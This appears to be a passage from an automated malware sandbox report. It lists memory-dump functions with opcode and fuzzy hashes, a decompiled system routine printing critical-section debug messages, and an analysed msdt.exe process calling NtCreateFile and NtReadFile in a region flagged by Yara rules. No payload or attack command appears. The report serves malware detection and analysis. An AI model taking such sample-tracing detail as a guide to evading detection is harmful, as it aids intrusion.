                                              • Opcode ID: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction ID: 399acb018b5c7d57792455a55fc03a5e5b46c6d13e0b3845388b8a4432b92fc0
                                              • Opcode Fuzzy Hash: d6c0dd98bdc9d799c561df663a79a4cb1d0de1ba5bb4d066895db6aa0bb5cbb5
                                              • Instruction Fuzzy Hash: 95C01232180648BBCB126E81CC00F067B2AEBA4B60F008010BA080A5A0C632E9B0EA84
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01903A1C, Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction ID: 13c30a883cb70f893b920fb4f4f769778f9dcfff0bbf3db73d28d35a65153971
                                              • Opcode Fuzzy Hash: 96eed22535127586772c7987771c80cba013ba6a1ffa665a55b2596939b117e5
                                              • Instruction Fuzzy Hash: C3C04C32180648BBC7126E45DD01F157B69E7A4B60F154021B7080B5A1D576ED61D598
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018EAD30, Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction ID: 7be3263295cf80806cdf716d30d5f6fff9c111427d110ed82285efde72e1f03a
                                              • Opcode Fuzzy Hash: f53cbf097bf331e7efa67100c9216def11484318fb2f65513ba4bfb7ef6fc44f
                                              • Instruction Fuzzy Hash: EDC08C32080248BBC7126A85CD00F017B29E7A0BA0F000020B6080A6A2C932E860D588
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019136CC, Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction ID: 2da1319eaa9a2a9efcfb877f0e49ff6004e2babc034545874b746040e68ac9cb
                                              • Opcode Fuzzy Hash: 4f3d4ce0a081fc3392adb3a1b0c88d62f1a47c6b625de355985342774c730a51
                                              • Instruction Fuzzy Hash: E4C02B70150840FFD7165F30CF01F147268F740A72F6407647324464F0E5289C00D100
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 018F76E2, Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction ID: ccad04f39f5e9eb18ae106d51eaf9ecc0af51937a2a4a462eea2a73aac161fbd
                                              • Opcode Fuzzy Hash: 779d3b12954878cff5fec068ca9c86adddf3072d6236c1739843d2e534c1de0a
                                              • Instruction Fuzzy Hash: 8BC08C701411805EFB2B570CCE20B203A50AB08708F4801ACAB45894E2D36CB902C248
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01907D50, Relevance: .0, Instructions: 7COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction ID: 2daa9ecb6e24ba3e8907277029f5a9d4dc07a7a1618eb0ac3425dc70c92a9d26
                                              • Opcode Fuzzy Hash: d8f8299b16f752bf61d1185b43a99e53329511a2be3aa4238e34382007679d93
                                              • Instruction Fuzzy Hash: 98B092353019408FCE1BDF18C080B1533E8BB44A40B8400D0E404CBA21D229E9008900
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01912ACB, Relevance: .0, Instructions: 5COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction ID: ead375b341380766878e1470b3c1aadd5e43cd3ab07535329c35d249cf4e9357
                                              • Opcode Fuzzy Hash: 15609d918e1561f37e97de8b3878496f5feb00f452f9af5c60cfc93e4e46d55a
                                              • Instruction Fuzzy Hash: A4B01232C10445CFCF02EF44C650B197332FB00750F0644949101B7930C228AD01CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019299D0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8fadadcd4cdd42bec00fb4e522730cb3553d8700e3b83098c220512be90a1317
                                              • Instruction ID: 3ac500901594b8ffb197f622cd6f16181af1c7369ceec3208944241f0d83a0ca
                                              • Opcode Fuzzy Hash: 8fadadcd4cdd42bec00fb4e522730cb3553d8700e3b83098c220512be90a1317
                                              • Instruction Fuzzy Hash: 2D9002A162110042D1046199441470640C5A7E1242F91C012A2184554CC5698C716165
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929950, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 18117ab70d3e50341fbfbed99477e8c22deba28564281f2811f4ce60cb054b94
                                              • Instruction ID: 5efa28d5115634bd4c5cf23545e58b3914d477823f764da9c9650b16f6269e2a
                                              • Opcode Fuzzy Hash: 18117ab70d3e50341fbfbed99477e8c22deba28564281f2811f4ce60cb054b94
                                              • Instruction Fuzzy Hash: 8A9002A161150403D140659948146074085A7D0343F91C011A2094555ECA698C617175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019298A0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cd6e6c3085e2c328ab0ca19ba6ab26cf0e7567d85bf5bc097fb08555f6c28b23
                                              • Instruction ID: 32e431d9c8e9feec3400b22bf84d085514b040ad70633de53850e6bd1b60e77f
                                              • Opcode Fuzzy Hash: cd6e6c3085e2c328ab0ca19ba6ab26cf0e7567d85bf5bc097fb08555f6c28b23
                                              • Instruction Fuzzy Hash: 3190026171110402D102619944246064089E7D1386FD1C012E1454555DC6658963B172
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929820, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 982659626b84bc12838b02b6e2d11f3e9ccac74583d187a7ae643162221cd23f
                                              • Instruction ID: c2d7d9028324c5158759ad2d6205648baecbe433d53f42b4979b359b6db3e551
                                              • Opcode Fuzzy Hash: 982659626b84bc12838b02b6e2d11f3e9ccac74583d187a7ae643162221cd23f
                                              • Instruction Fuzzy Hash: 5D90027165110402D141719944146064089B7D0282FD1C012A0454554EC6958A66BAA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0192B040, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ed66aa69ddfa74ec18681fea0cd4b0e8ce05d05dab979328a1b58e1938bbb4e2
                                              • Instruction ID: b86d707b29d1f9bd5b3b6af05f8f575f954eb52a5483cb00257eece02ade99da
                                              • Opcode Fuzzy Hash: ed66aa69ddfa74ec18681fea0cd4b0e8ce05d05dab979328a1b58e1938bbb4e2
                                              • Instruction Fuzzy Hash: 589002A1A11240434540B19948144069095B7E13423D1C121A0484560CC6A88865A2A5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0192A3B0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ea6219b4c7a94f28917801ce7d93c54e9af8c8bb5f35f64c28fa07e501b31a14
                                              • Instruction ID: 481bc3ac8482457a44ff5300cca8494c986d95943795af4396b0e6059fc6ab94
                                              • Opcode Fuzzy Hash: ea6219b4c7a94f28917801ce7d93c54e9af8c8bb5f35f64c28fa07e501b31a14
                                              • Instruction Fuzzy Hash: E390027161154002D1407199845460B9085B7E0342F91C411E0455554CC6558866A261
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929B00, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3615f4efe181eaf3e96bef46e2e37331ab68b4460c9f25a97a8b3e59a0f3a1d
                                              • Instruction ID: f4ebbcce3b71f1c3ce96c5bfdbcc87e0e3d354af7f15aa5f64ba00fed9e57fdc
                                              • Opcode Fuzzy Hash: f3615f4efe181eaf3e96bef46e2e37331ab68b4460c9f25a97a8b3e59a0f3a1d
                                              • Instruction Fuzzy Hash: AC90026165110802D140719984247074086E7D0642F91C011A0054554DC656897576F1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929A80, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b26858e2ce06f20443228b1259f81fbb752f93464a741f8e2530f06ffa3cd697
                                              • Instruction ID: 141d5bfbf4eae744b17ea0b0b19bdd9d16f4dfe9d0c216c2f0b29fb1340f3d8a
                                              • Opcode Fuzzy Hash: b26858e2ce06f20443228b1259f81fbb752f93464a741f8e2530f06ffa3cd697
                                              • Instruction Fuzzy Hash: B490026161154442D14062994814B0F8185A7E1243FD1C019A4186554CC95588656761
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929A10, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                              • Instruction ID: 73e9f320d188ea3f79ff49ad5a27ed0dc3927984ada1d5130019ff7f86ba7e94
                                              • Opcode Fuzzy Hash: 2fe9f9ada4df872112199148dc0eddd837f4a5d6080dd1855b3d93d253d80464
                                              • Instruction Fuzzy Hash: 1090027161150402D100619948187474085A7D0343F91C011A5194555EC6A5C8A17571
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019295F0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a347ea4aef551ea581da2b5cb5c62d0e12e0c0886521ae5b3905a198d2e8a366
                                              • Instruction ID: 0169d6b25eaec9c287242cf6e0045f8ec283549fae5168d3efa7d6ae376a696b
                                              • Opcode Fuzzy Hash: a347ea4aef551ea581da2b5cb5c62d0e12e0c0886521ae5b3905a198d2e8a366
                                              • Instruction Fuzzy Hash: CB90027161110802D104619948146864085A7D0342F91C011A6054655ED6A588A17171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0192AD30, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb172e44b97c24a33c896ad0cc7b294c0d0d4834f779977decaf45578b808ddd
                                              • Instruction ID: fb869649c22ce5cc690c505090ac736693a7c08b28daa4b8a8407879cdefbdb0
                                              • Opcode Fuzzy Hash: bb172e44b97c24a33c896ad0cc7b294c0d0d4834f779977decaf45578b808ddd
                                              • Instruction Fuzzy Hash: 40900271E15100129140719948246468086B7E0782B95C011A0544554CC9948A6563E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929520, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df2d04358f89ccc0cd4667c040d6dba9ebdddd23d77d90715eb5c78ce101c353
                                              • Instruction ID: a97ee66173ed7b0e37a8991fc08af0ee0b6c54505eb15a2192e34eea6b372aab
                                              • Opcode Fuzzy Hash: df2d04358f89ccc0cd4667c040d6dba9ebdddd23d77d90715eb5c78ce101c353
                                              • Instruction Fuzzy Hash: C49002E1611240924500A2998414B0A8585A7E0242B91C016E1084560CC5658861A175
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929560, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 500d9fbdbeed23ea0688c8fc2bc2d87562272f2d4fa0e7d99f9842bf0a1b391a
                                              • Instruction ID: cd203e9195355d12928e532f92788013e07130a62cd14e0a2842a9b5f58e76e1
                                              • Opcode Fuzzy Hash: 500d9fbdbeed23ea0688c8fc2bc2d87562272f2d4fa0e7d99f9842bf0a1b391a
                                              • Instruction Fuzzy Hash: 4F900265631100020145A599061450B44C5B7D63923D1C015F1446590CC66188756361
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0192A710, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11dfcc7774b81176154b4136b89bbc4f179b576d97748df886a2c4868ec48815
                                              • Instruction ID: 1d58a6f788e7e8e7f2df70df938bda3ab175aac5bcc7298ebdfa02dcc7f6f9bf
                                              • Opcode Fuzzy Hash: 11dfcc7774b81176154b4136b89bbc4f179b576d97748df886a2c4868ec48815
                                              • Instruction Fuzzy Hash: 1D900271711100529500A6D95814A4A8185A7F0342B91D015A4044554CC59488716161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929730, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cc7dcf6acdc2d17aaee73daf78b8d63eebf248481f6e323a5084e2420ed0875e
                                              • Instruction ID: 7d5bbe71b81109dfd854227b1dd724b2a0cbdbfb0bf8f20c0ff9d0176ed80e79
                                              • Opcode Fuzzy Hash: cc7dcf6acdc2d17aaee73daf78b8d63eebf248481f6e323a5084e2420ed0875e
                                              • Instruction Fuzzy Hash: CC900261A1510402D140719954287064095A7D0242F91D011A0054554DC6998A6576E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0192A770, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6671c3c64939c80a2073027ef7e906eb6ff9f900d78e35f8c1fa493d6cd429a2
                                              • Instruction ID: 0d51e2defc50e00ab912fde8ae30904f3dc1a2594eea483dafbb8d36fcef6af7
                                              • Opcode Fuzzy Hash: 6671c3c64939c80a2073027ef7e906eb6ff9f900d78e35f8c1fa493d6cd429a2
                                              • Instruction Fuzzy Hash: DA90027561514442D50065995814A874085A7D0346F91D411A045459CDC6948871B161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929770, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e8ef19a6aa36f2664ae5b69bfda6edd18c1ad669d3b8d63acbeb255174119581
                                              • Instruction ID: de1f7cd9fe52777eaa019e83d12f1c7863347ec745462e9205b50708eb37b632
                                              • Opcode Fuzzy Hash: e8ef19a6aa36f2664ae5b69bfda6edd18c1ad669d3b8d63acbeb255174119581
                                              • Instruction Fuzzy Hash: 1A90026161514442D10065995418A064085A7D0246F91D011A1094595DC6758861B171
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929760, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e3f7d16278b3c25dd23c6f7dbecf0f015662de814b599324750f3b3c6eaa811
                                              • Instruction ID: b7569417c32785d51139d7bbffa54a1fc5f0dec7e72558fe6cff3e8af8528cb5
                                              • Opcode Fuzzy Hash: 1e3f7d16278b3c25dd23c6f7dbecf0f015662de814b599324750f3b3c6eaa811
                                              • Instruction Fuzzy Hash: E890027161110403D100619955187074085A7D0242F91D411A0454558DD69688617161
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 019296D0, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                              • Instruction ID: c9021a21876530b93bb3b43616cc4c3fa1e8048902dd96d345e9781aadc4b894
                                              • Opcode Fuzzy Hash: 975b43d984765baa0982a2bbb0993c886140d0261de0792571f72b7a9d78b124
                                              • Instruction Fuzzy Hash: 9C90027161110842D10061994414B464085A7E0342F91C016A0154654DC655C8617561
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929610, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                              • Instruction ID: 3e0dda3aaa51f3ebd6b044e59335734a548ced5fe445c91a4eb7d6efdbfb1a0f
                                              • Opcode Fuzzy Hash: c1d7013d6ffbb8267e0d408457a7e0db4867c718cf2dee030006277b02db146f
                                              • Instruction Fuzzy Hash: 54900271A1510802D150719944247464085A7D0342F91C011A0054654DC7958A6576E1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929650, Relevance: .0, Instructions: 4COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                              • Instruction ID: aa4bd14010cb60707b538f73adfaa91e180c99db87e0ae9808f8f246af9dfdac
                                              • Opcode Fuzzy Hash: 67795cc70ba076844573fe49f3edb2ba0294203a00e66d2c242c7ff669dd11f0
                                              • Instruction Fuzzy Hash: FF90027161514842D14071994414A464095A7D0346F91C011A0094694DD6658D65B6A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 01929670, Relevance: .0, Instructions: 2COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction ID: 17387ead08ee10de9573033b96520e48e21befe1425d0ec219086c1de7d52164
                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                              • Instruction Fuzzy Hash:
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0197FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 53%
                                              			E0197FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0192CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01975720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01975720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                              0x0197fdda
                                              0x0197fde2
                                              0x0197fde5
                                              0x0197fdec
                                              0x0197fdfa
                                              0x0197fdff
                                              0x0197fe0a
                                              0x0197fe0f
                                              0x0197fe17
                                              0x0197fe1e
                                              0x0197fe19
                                              0x0197fe19
                                              0x0197fe19
                                              0x0197fe20
                                              0x0197fe21
                                              0x0197fe22
                                              0x0197fe25
                                              0x0197fe40

                                              APIs
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0197FDFA
                                              Strings
                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0197FE01
                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0197FE2B
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.347003481.00000000018C0000.00000040.00000001.sdmp, Offset: 018C0000, based on PE: true
                                              Similarity
                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                              • API String ID: 885266447-3903918235
                                              • Opcode ID: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                              • Instruction ID: be1e839000e0d861026ded0029bb848aa538ec19f7670295436f854e8bb63232
                                              • Opcode Fuzzy Hash: 8faca7e64d17c73a88e3cab995300465b8c6e3289fc7fbefa1f1c270effdc2ff
                                              • Instruction Fuzzy Hash: 56F0C232200601BBEA201A55DC02E23BB6AEF84B30F150614F628561D1DA62B92096F0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: msdt.exe PID: 5960 Parent PID: 3352 msdt.exeCOMMON

                                              Executed Functions

                                              Function 02D185DA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,02D13BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D13BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D1862D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`$U
                                              • API String ID: 823142352-510634365
                                              • Opcode ID: a77eca7dfe08da1f5d00c6688aba2fa64a33e9c55b0d16d150f0328ce01b96ed
                                              • Instruction ID: 404109ec90ad1bc7a76472abc3009d74ba47ebdc1484c66eef08c01a072d4228
                                              • Opcode Fuzzy Hash: a77eca7dfe08da1f5d00c6688aba2fa64a33e9c55b0d16d150f0328ce01b96ed
                                              • Instruction Fuzzy Hash: 4001B2B2254208ABDB08CF99DC94EEB77EDEF8C754F158258FA1D97241D630E851CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D185E0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,02D13BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02D13BB7,007A002E,00000000,00000060,00000000,00000000), ref: 02D1862D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: .z`
                                              • API String ID: 823142352-1441809116
                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction ID: 212bc69a968f58648e6c6095532fab450809e87a6517fd42403a414d6e6ed463
                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                              • Instruction Fuzzy Hash: ECF0BDB2204208ABCB08CF88DC94EEB77ADAF8C754F158248FA0D97240C630E851CBA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1873A, Relevance: 1.5, APIs: 1, Instructions: 46filenativeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • NtReadFile.NTDLL(02D13D72,5E972F65,FFFFFFFF,02D13A31,?,?,02D13D72,?,02D13A31,FFFFFFFF,5E972F65,02D13D72,?,00000000), ref: 02D186D5
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.554339019.0000000002D00000.00000040.00020000.sdmp, Offset: 02D00000, based on PE: false
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 7595eb86648a68fd0ddcae4f76788c50ec2ab6562c5b94951d801339a902f3ba
                                              • Instruction ID: b1ab3d772cac8f6c5224785fed3d629852fe3d1ecb5f381e50e6fb5472e35af5
                                              • Opcode Fuzzy Hash: 7595eb86648a68fd0ddcae4f76788c50ec2ab6562c5b94951d801339a902f3ba
                                              • Instruction Fuzzy Hash: 9E01F2B6200208AFDB14DF89EC80DAB77AEEF8C650F108649FA5C97250C630E851CBB0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D18690, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                              Download Yara Rule
                                              APIs
